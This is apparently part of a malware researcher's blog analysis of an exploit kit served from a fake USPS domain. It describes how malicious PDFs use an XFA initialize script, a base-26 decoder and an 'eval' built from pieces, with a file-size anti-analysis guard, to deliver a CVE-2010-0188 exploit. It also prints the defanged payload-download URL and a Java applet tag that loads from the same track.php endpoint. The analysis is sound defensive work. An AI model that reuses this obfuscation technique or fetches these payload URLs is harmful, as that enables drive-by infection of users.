Pretty ugly stuff: the "initialize" event script on the ImageField above is a decoder — strip the "^!@#" and "**" separators, read the rest two characters at a time as base-26 numbers minus 15 to get character codes — which hands the result to event.target["eval"] (built as "e" + fromCharCode(0x76, 0x61) + "l"). It only runs if the document has no Authors metadata and is larger than 9000 bytes: "(16000, 9000)" is the comma operator, so the 16000 is a decoy, and all three PDFs (9874–10838 bytes) pass 9000 but would fail 16000 — a cheap guard against the script being run after extraction from the PDF. The decoded stage is the CVE-2010-0188 exploit (an XFA ImageField with an initialize script is the pattern usually seen with that bug).
Once the exploit succeeds, the decoded stage fetches its payload from the URL below. Note that the ccb parameter is the same 30:30:33:1k:1h:31:2v:1n:1l:1h token (ccf52da862) the landing page put into every exploit request, so the payload download is tied to the same session:
hxxp://www5-usps.com/nbh/sends/track.php?jggg=32:1h:1l:1l:1j&ccb=30:30:33:1k:1h:31:2v:1n:1l:1h&qjqjo=1i&madrmk=fsjuhw&aazds=seyv
Since I left this alone for a couple of days the site was, as expected, no longer serving anything, so no additional payload for me.
Wepawet report here
The other two PDFs (the Content-Disposition filenames in the fetches above) use the same XFA decoder-and-eval method:
6ed41.pdf -> Wepawet
7453e.pdf -> Wepawet
No Java?
I had expected some Java to hit me from the EK as well, but by going straight for the PluginDetect code I missed this applet tag. Its code attribute is two numeric character references which, once the O-for-0 copy artifact is undone (&#00104; &#00119;), spell the class name "hw"; the jar is served by the same track.php, and the long "prime" parameter is presumably the encoded payload URL handed to the Java exploit, though nothing here confirms that:<applet code="&#OO1O4;&#OO119;" archive="/nbh/sends/track.php">
<param value="Dyy3Ojj" name="val" />
<param value="fa" name="earth" />
<param name="prime" value="___4mKi3iw%tOjo?DjieoMijylV%qw3D3xA.b1hO6DO6-O6-O6CRVeb1fO1fO11O6qO6DO16OhvO6oO6-O6DRCb6.RVObqRAlb-" />
</applet>
Too late to fetch the jar as well.